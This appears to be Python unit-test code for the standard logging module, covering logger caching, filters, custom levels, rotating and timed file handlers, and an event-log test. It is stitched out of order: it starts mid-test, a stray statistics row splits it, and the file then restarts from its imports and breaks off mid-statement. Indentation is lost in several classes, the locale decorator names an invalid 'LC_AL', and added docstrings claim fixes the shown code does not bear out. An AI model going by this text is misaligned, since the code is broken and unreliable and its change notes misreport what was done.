self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
    "Base class for handler tests that write log files"
    def setUp(self):
        BaseTest.setUp(self)
        # Create (and immediately close) a unique temp file; the handlers
        # under test reopen it by name through self.fn.
        fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
        os.close(fd)
        # Extra files registered via assertLogFile; removed in tearDown.
        self.rmfiles = []
    def tearDown(self):
        # Remove every rotated/registered file, then the base log file.
        for fn in self.rmfiles:
            os.unlink(fn)
        if os.path.exists(self.fn):
            os.unlink(self.fn)
        BaseTest.tearDown(self)
    def assertLogFile(self, filename):
        "Assert a log file is there and register it for deletion"
        self.assertTrue(os.path.exists(filename),
                        msg="Log file %r does not exist" % filename)
        self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
    def test_delay(self):
        """A FileHandler created with delay=True must defer opening its
        stream (and creating the file) until the first record is handled."""
        os.unlink(self.fn)
        handler = logging.FileHandler(self.fn, delay=True)
        # Nothing opened yet: no stream object, no file on disk.
        self.assertFalse(os.path.exists(self.fn))
        self.assertIsNone(handler.stream)
        record = logging.makeLogRecord({})
        handler.handle(record)
        # Handling a record forces the stream (and file) into existence.
        self.assertTrue(os.path.exists(self.fn))
        self.assertIsNotNone(handler.stream)
        handler.close()
class RotatingFileHandlerTest(BaseFileTest):
    """Tests for RotatingFileHandler: rollover decisions, rotated-file
    naming, and the pluggable ``namer``/``rotator`` hooks."""
    def next_rec(self):
        # Minimal DEBUG record whose message is the next sequence number.
        return logging.LogRecord('n', logging.DEBUG, 'p', 1,
                                 self.next_message(), None, None, None)
    def test_should_not_rollover(self):
        # If maxbytes is zero rollover never occurs
        rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
        self.assertFalse(rh.shouldRollover(None))
        rh.close()
    def test_should_rollover(self):
        # maxBytes=1: any non-empty record pushes the file over the limit.
        rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
        self.assertTrue(rh.shouldRollover(self.next_rec()))
        rh.close()
    def test_file_created(self):
        # checks that the file is created and assumes it was created
        # by us
        rh = logging.handlers.RotatingFileHandler(self.fn)
        rh.emit(self.next_rec())
        self.assertLogFile(self.fn)
        rh.close()
    def test_rollover_filenames(self):
        # The namer hook must be applied to every rotated backup name
        # (base name + ".1", ".2", ...), and backupCount must cap the
        # number of backups that can ever exist.
        def namer(name):
            return name + ".test"
        rh = logging.handlers.RotatingFileHandler(
            self.fn, backupCount=2, maxBytes=1)
        rh.namer = namer
        rh.emit(self.next_rec())
        self.assertLogFile(self.fn)
        rh.emit(self.next_rec())
        self.assertLogFile(namer(self.fn + ".1"))
        rh.emit(self.next_rec())
        self.assertLogFile(namer(self.fn + ".2"))
        self.assertFalse(os.path.exists(namer(self.fn + ".3")))
        rh.close()
    @support.requires_zlib
    def test_rotator(self):
        # The rotator hook replaces the default rename: here it
        # gzip-compresses each rotated file; the test then decompresses
        # the backups to verify which message landed in which generation.
        def namer(name):
            return name + ".gz"
        def rotator(source, dest):
            with open(source, "rb") as sf:
                data = sf.read()
                compressed = zlib.compress(data, 9)
                with open(dest, "wb") as df:
                    df.write(compressed)
            os.remove(source)
        rh = logging.handlers.RotatingFileHandler(
            self.fn, backupCount=2, maxBytes=1)
        rh.rotator = rotator
        rh.namer = namer
        m1 = self.next_rec()
        rh.emit(m1)
        self.assertLogFile(self.fn)
        m2 = self.next_rec()
        rh.emit(m2)
        fn = namer(self.fn + ".1")
        self.assertLogFile(fn)
        newline = os.linesep
        # First rollover: m1 was rotated into the ".1" backup.
        with open(fn, "rb") as f:
            compressed = f.read()
            data = zlib.decompress(compressed)
            self.assertEqual(data.decode("ascii"), m1.msg + newline)
        rh.emit(self.next_rec())
        fn = namer(self.fn + ".2")
        self.assertLogFile(fn)
        # Second rollover: m1 has shifted down into ".2".
        with open(fn, "rb") as f:
            compressed = f.read()
            data = zlib.decompress(compressed)
            self.assertEqual(data.decode("ascii"), m1.msg + newline)
        rh.emit(self.next_rec())
        fn = namer(self.fn + ".2")
        # Third rollover: m1 falls off the end (backupCount=2) and m2
        # now occupies ".2"; a ".3" backup must never appear.
        with open(fn, "rb") as f:
            compressed = f.read()
            data = zlib.decompress(compressed)
            self.assertEqual(data.decode("ascii"), m2.msg + newline)
        self.assertFalse(os.path.exists(namer(self.fn + ".3")))
        rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
    # The test_compute_rollover_* methods are generated in a loop and
    # attached to this class via setattr() below the class body.
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
    """Windows-only smoke test: a record emitted through NTEventLogHandler
    must show up in the 'Application' event log."""
    def test_basic(self):
        logtype = 'Application'
        elh = win32evtlog.OpenEventLog(None, logtype)
        # Record the log size beforehand so we can assert it grew.
        num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
        try:
            h = logging.handlers.NTEventLogHandler('test_logging')
        except pywintypes.error as e:
            if e.winerror == 5: # access denied
                raise unittest.SkipTest('Insufficient privileges to run test')
            raise
        r = logging.makeLogRecord({'msg': 'Test Log Message'})
        h.handle(r)
        h.close()
        # Now see if the event is recorded
        self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
        flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
                win32evtlog.EVENTLOG_SEQUENTIAL_READ
        found = False
        # Only scan the most recent GO_BACK records (read backwards from
        # the newest) for our source name and exact message text.
        GO_BACK = 100
        events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
        for e in events:
            if e.SourceName != 'test_logging':
                continue
            msg = win32evtlogutil.SafeFormatMessage(e, logtype)
            if msg != 'Test Log Message\r\n':
                continue
            found = True
            break
        msg = 'Record not found in event log, went back %d records' % GO_BACK
        self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
    def test__all__(self):
        """logging.__all__ must cover every public name except the
        deliberate exclusions listed here."""
        not_exported = {
            'logThreads', 'logMultiprocessing', 'logProcesses',
            'currentframe', 'PercentStyle', 'StrFormatStyle',
            'StringTemplateStyle', 'Filterer', 'PlaceHolder', 'Manager',
            'RootLogger', 'root', 'threading',
        }
        support.check__all__(self, logging, blacklist=not_exported)
# Run the suite under the platform's default locale so that any
# locale-dependent formatting (e.g. date/number output) is exercised
# realistically; run_with_locale saves the current locale first and
# restores it when the tests finish.
@support.run_with_locale('LC_AL', '')
def test_main():
    """Run every test class in this module (see the locale note above the
    decorator in the original file: the current locale is saved/restored)."""
    tests = [
        BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
        HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
        DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
        ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
        StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
        QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
        LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
        RotatingFileHandlerTest, LastResortTest, LogRecordTest,
        ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
        NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
        UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
        MiscTestCase
    ]
    # QueueListener may be absent from logging.handlers on some builds
    # (presumably those without threading) - only add its tests if present.
    if hasattr(logging.handlers, 'QueueListener'):
        tests.append(QueueListenerTest)
    support.run_unittest(*tests)
# Standard script entry point: run the whole suite when executed directly.
if __name__ == "__main__":
    test_main()
| 34.908493 | 99 | 0.566498 |
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
    """Test builtin levels and their inheritance through the logger tree.

    Fix: the original file defined ``test_regression_29220`` twice; the
    first, shorter definition was dead code silently shadowed by the
    second (a strict superset of it), so the duplicate has been removed.
    """

    def test_flat(self):
        """Levels on sibling loggers in a flat namespace are independent."""
        m = self.next_message

        ERR = logging.getLogger("ERR")
        ERR.setLevel(logging.ERROR)
        # One logger is wrapped in a LoggerAdapter to check that adapters
        # honour levels the same way plain loggers do.
        INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
        INF.setLevel(logging.INFO)
        DEB = logging.getLogger("DEB")
        DEB.setLevel(logging.DEBUG)

        # These calls are at or above their logger's level and should log.
        ERR.log(logging.CRITICAL, m())
        ERR.error(m())

        INF.log(logging.CRITICAL, m())
        INF.error(m())
        INF.warning(m())
        INF.info(m())

        DEB.log(logging.CRITICAL, m())
        DEB.error(m())
        DEB.warning(m())
        DEB.info(m())
        DEB.debug(m())

        # These calls are below their logger's level and must be dropped.
        ERR.warning(m())
        ERR.info(m())
        ERR.debug(m())

        INF.debug(m())

        self.assert_log_lines([
            ('ERR', 'CRITICAL', '1'),
            ('ERR', 'ERROR', '2'),
            ('INF', 'CRITICAL', '3'),
            ('INF', 'ERROR', '4'),
            ('INF', 'WARNING', '5'),
            ('INF', 'INFO', '6'),
            ('DEB', 'CRITICAL', '7'),
            ('DEB', 'ERROR', '8'),
            ('DEB', 'WARNING', '9'),
            ('DEB', 'INFO', '10'),
            ('DEB', 'DEBUG', '11'),
        ])

    def test_nested_explicit(self):
        """A child logger's own explicit level wins over its parent's."""
        m = self.next_message

        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        INF_ERR = logging.getLogger("INF.ERR")
        INF_ERR.setLevel(logging.ERROR)

        # Only CRITICAL and ERROR pass INF.ERR's explicit ERROR level.
        INF_ERR.log(logging.CRITICAL, m())
        INF_ERR.error(m())

        INF_ERR.warning(m())
        INF_ERR.info(m())
        INF_ERR.debug(m())

        self.assert_log_lines([
            ('INF.ERR', 'CRITICAL', '1'),
            ('INF.ERR', 'ERROR', '2'),
        ])

    def test_nested_inherited(self):
        """Loggers without an explicit level inherit the nearest ancestor's."""
        m = self.next_message

        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        INF_ERR = logging.getLogger("INF.ERR")
        INF_ERR.setLevel(logging.ERROR)
        # No explicit level: these inherit from INF and INF.ERR respectively.
        INF_UNDEF = logging.getLogger("INF.UNDEF")
        INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
        UNDEF = logging.getLogger("UNDEF")

        # INF.UNDEF inherits INFO; INF.ERR.UNDEF inherits ERROR.
        INF_UNDEF.log(logging.CRITICAL, m())
        INF_UNDEF.error(m())
        INF_UNDEF.warning(m())
        INF_UNDEF.info(m())

        INF_ERR_UNDEF.log(logging.CRITICAL, m())
        INF_ERR_UNDEF.error(m())

        # Below the inherited thresholds; must be dropped.
        INF_UNDEF.debug(m())
        INF_ERR_UNDEF.warning(m())
        INF_ERR_UNDEF.info(m())
        INF_ERR_UNDEF.debug(m())

        self.assert_log_lines([
            ('INF.UNDEF', 'CRITICAL', '1'),
            ('INF.UNDEF', 'ERROR', '2'),
            ('INF.UNDEF', 'WARNING', '3'),
            ('INF.UNDEF', 'INFO', '4'),
            ('INF.ERR.UNDEF', 'CRITICAL', '5'),
            ('INF.ERR.UNDEF', 'ERROR', '6'),
        ])

    def test_nested_with_virtual_parent(self):
        """Level inheritance skips intermediate loggers created later
        (placeholder/virtual parents) and still finds the real ancestor."""
        m = self.next_message

        INF = logging.getLogger("INF")
        # Grandchild is created before its parent, so "INF.BADPARENT"
        # starts out as a placeholder in the logger tree.
        GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
        CHILD = logging.getLogger("INF.BADPARENT")
        INF.setLevel(logging.INFO)

        # Both inherit INFO from INF.
        GRANDCHILD.log(logging.FATAL, m())
        GRANDCHILD.info(m())
        CHILD.log(logging.FATAL, m())
        CHILD.info(m())

        # DEBUG is below the inherited INFO level; dropped.
        GRANDCHILD.debug(m())
        CHILD.debug(m())

        self.assert_log_lines([
            ('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
            ('INF.BADPARENT.UNDEF', 'INFO', '2'),
            ('INF.BADPARENT', 'CRITICAL', '3'),
            ('INF.BADPARENT', 'INFO', '4'),
        ])

    def test_regression_22386(self):
        """getLevelName maps names to numbers and numbers to names."""
        self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
        self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')

    def test_issue27935(self):
        """'FATAL' resolves to the same numeric level as CRITICAL."""
        fatal = logging.getLevelName('FATAL')
        self.assertEqual(fatal, logging.FATAL)

    def test_regression_29220(self):
        """Renaming a level to '' must not break NOTSET's name mapping."""
        logging.addLevelName(logging.INFO, '')
        self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
        self.assertEqual(logging.getLevelName(logging.INFO), '')
        self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
        self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
    """Test the bundled Filter class."""

    def test_filter(self):
        # Only messages whose logger name matches the "spam.eggs" prefix
        # should pass the Filter attached to the root handler.
        filter_ = logging.Filter("spam.eggs")
        handler = self.root_logger.handlers[0]
        try:
            handler.addFilter(filter_)
            spam = logging.getLogger("spam")
            spam_eggs = logging.getLogger("spam.eggs")
            spam_eggs_fish = logging.getLogger("spam.eggs.fish")
            spam_bakedbeans = logging.getLogger("spam.bakedbeans")
            spam.info(self.next_message())
            spam_eggs.info(self.next_message())
            spam_eggs_fish.info(self.next_message())
            spam_bakedbeans.info(self.next_message())
            # Messages 1 and 4 are filtered out; only 2 and 3 come through.
            self.assert_log_lines([
                ('spam.eggs', 'INFO', '2'),
                ('spam.eggs.fish', 'INFO', '3'),
            ])
        finally:
            handler.removeFilter(filter_)

    def test_callable_filter(self):
        # A plain callable (not a Filter instance) may be used as a filter.
        def filterfunc(record):
            parts = record.name.split('.')
            prefix = '.'.join(parts[:2])
            return prefix == 'spam.eggs'
        handler = self.root_logger.handlers[0]
        try:
            handler.addFilter(filterfunc)
            spam = logging.getLogger("spam")
            spam_eggs = logging.getLogger("spam.eggs")
            spam_eggs_fish = logging.getLogger("spam.eggs.fish")
            spam_bakedbeans = logging.getLogger("spam.bakedbeans")
            spam.info(self.next_message())
            spam_eggs.info(self.next_message())
            spam_eggs_fish.info(self.next_message())
            spam_bakedbeans.info(self.next_message())
            self.assert_log_lines([
                ('spam.eggs', 'INFO', '2'),
                ('spam.eggs.fish', 'INFO', '3'),
            ])
        finally:
            handler.removeFilter(filterfunc)

    def test_empty_filter(self):
        # A Filter with no name lets every record through.
        f = logging.Filter()
        r = logging.makeLogRecord({'name': 'spam.eggs'})
        self.assertTrue(f.filter(r))
# Custom logging levels used by CustomLevelsAndFiltersTest, deliberately
# chosen above the standard CRITICAL (50) range so they cannot clash with
# the builtin levels.
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111

# Inclusive range covering every custom level, BORING through SILENT.
LEVEL_RANGE = range(BORING, SILENT + 1)

# Next, define names for the custom levels.  Levels must be registered with
# logging.addLevelName() (done in CustomLevelsAndFiltersTest.setUp), in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
    SILENT : 'Silent',
    TACITURN : 'Taciturn',
    TERSE : 'Terse',
    EFFUSIVE : 'Effusive',
    SOCIABLE : 'Sociable',
    VERBOSE : 'Verbose',
    TALKATIVE : 'Talkative',
    GARRULOUS : 'Garrulous',
    CHATTERBOX : 'Chatterbox',
    BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
    """Filter that blocks records logged at exactly the GARRULOUS level."""

    def filter(self, record):
        # Everything except GARRULOUS passes through.
        if record.levelno == GARRULOUS:
            return False
        return True
class VerySpecificFilter(logging.Filter):
    """Filter that blocks records logged at the SOCIABLE or TACITURN levels."""

    def filter(self, record):
        # Only these two specific levels are rejected.
        level = record.levelno
        return level != SOCIABLE and level != TACITURN
class CustomLevelsAndFiltersTest(BaseTest):
    """Test various filtering possibilities with custom logging levels."""

    # Skip the logger name group.
    expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"

    def setUp(self):
        BaseTest.setUp(self)
        # Register human-readable names for the custom levels.
        for k, v in my_logging_levels.items():
            logging.addLevelName(k, v)

    def log_at_all_levels(self, logger):
        # Emit one numbered message at every custom level, BORING..SILENT.
        for lvl in LEVEL_RANGE:
            logger.log(lvl, self.next_message())

    def test_logger_filter(self):
        # Filter at logger level.
        self.root_logger.setLevel(VERBOSE)
        # Levels >= 'Verbose' are good.
        self.log_at_all_levels(self.root_logger)
        self.assert_log_lines([
            ('Verbose', '5'),
            ('Sociable', '6'),
            ('Effusive', '7'),
            ('Terse', '8'),
            ('Taciturn', '9'),
            ('Silent', '10'),
        ])

    def test_handler_filter(self):
        # Filter at handler level.
        self.root_logger.handlers[0].setLevel(SOCIABLE)
        try:
            # Levels >= 'Sociable' are good.
            self.log_at_all_levels(self.root_logger)
            self.assert_log_lines([
                ('Sociable', '6'),
                ('Effusive', '7'),
                ('Terse', '8'),
                ('Taciturn', '9'),
                ('Silent', '10'),
            ])
        finally:
            self.root_logger.handlers[0].setLevel(logging.NOTSET)

    def test_specific_filters(self):
        # Set a specific filter object on the handler, and then add another
        # filter object on the logger itself.
        handler = self.root_logger.handlers[0]
        specific_filter = None
        garr = GarrulousFilter()
        handler.addFilter(garr)
        try:
            self.log_at_all_levels(self.root_logger)
            first_lines = [
                # Notice how 'Garrulous' is missing
                ('Boring', '1'),
                ('Chatterbox', '2'),
                ('Talkative', '4'),
                ('Verbose', '5'),
                ('Sociable', '6'),
                ('Effusive', '7'),
                ('Terse', '8'),
                ('Taciturn', '9'),
                ('Silent', '10'),
            ]
            self.assert_log_lines(first_lines)

            specific_filter = VerySpecificFilter()
            self.root_logger.addFilter(specific_filter)
            self.log_at_all_levels(self.root_logger)
            self.assert_log_lines(first_lines + [
                # Not only 'Garrulous' is still missing, but also 'Sociable'
                # and 'Taciturn'
                ('Boring', '11'),
                ('Chatterbox', '12'),
                ('Talkative', '14'),
                ('Verbose', '15'),
                ('Effusive', '17'),
                ('Terse', '18'),
                ('Silent', '20'),
            ])
        finally:
            if specific_filter:
                self.root_logger.removeFilter(specific_filter)
            handler.removeFilter(garr)
class HandlerTest(BaseTest):
    """Tests for Handler basics and several logging.handlers classes.

    Fix: the nested helper in ``test_race`` had lost its ``def r`` prefix
    (``emove_loop(fname, tries):``), a syntax error; it is restored as
    ``def remove_loop(fname, tries):``, the name referenced by the
    ``threading.Thread`` target below.
    """

    def test_name(self):
        # Handler.name is a settable property; emit() itself is abstract.
        h = logging.Handler()
        h.name = 'generic'
        self.assertEqual(h.name, 'generic')
        h.name = 'anothergeneric'
        self.assertEqual(h.name, 'anothergeneric')
        self.assertRaises(NotImplementedError, h.emit, None)

    def test_builtin_handlers(self):
        # We can't actually *use* too many handlers in the tests,
        # but we can try instantiating them with various options.
        if sys.platform in ('linux', 'darwin'):
            for existing in (True, False):
                fd, fn = tempfile.mkstemp()
                os.close(fd)
                if not existing:
                    os.unlink(fn)
                h = logging.handlers.WatchedFileHandler(fn, delay=True)
                if existing:
                    # delay=True means the file has not been opened yet,
                    # so dev/ino are still the -1 sentinels.
                    dev, ino = h.dev, h.ino
                    self.assertEqual(dev, -1)
                    self.assertEqual(ino, -1)
                    r = logging.makeLogRecord({'msg': 'Test'})
                    h.handle(r)
                    # Now remove the file.
                    os.unlink(fn)
                    self.assertFalse(os.path.exists(fn))
                    # The next call should recreate the file.
                    h.handle(r)
                    self.assertTrue(os.path.exists(fn))
                else:
                    self.assertEqual(h.dev, -1)
                    self.assertEqual(h.ino, -1)
                h.close()
                if existing:
                    os.unlink(fn)
            if sys.platform == 'darwin':
                sockname = '/var/run/syslog'
            else:
                sockname = '/dev/log'
            try:
                h = logging.handlers.SysLogHandler(sockname)
                self.assertEqual(h.facility, h.LOG_USER)
                self.assertTrue(h.unixsocket)
                h.close()
            except OSError:  # syslogd might not be available on this machine
                pass
        for method in ('GET', 'POST', 'PUT'):
            if method == 'PUT':
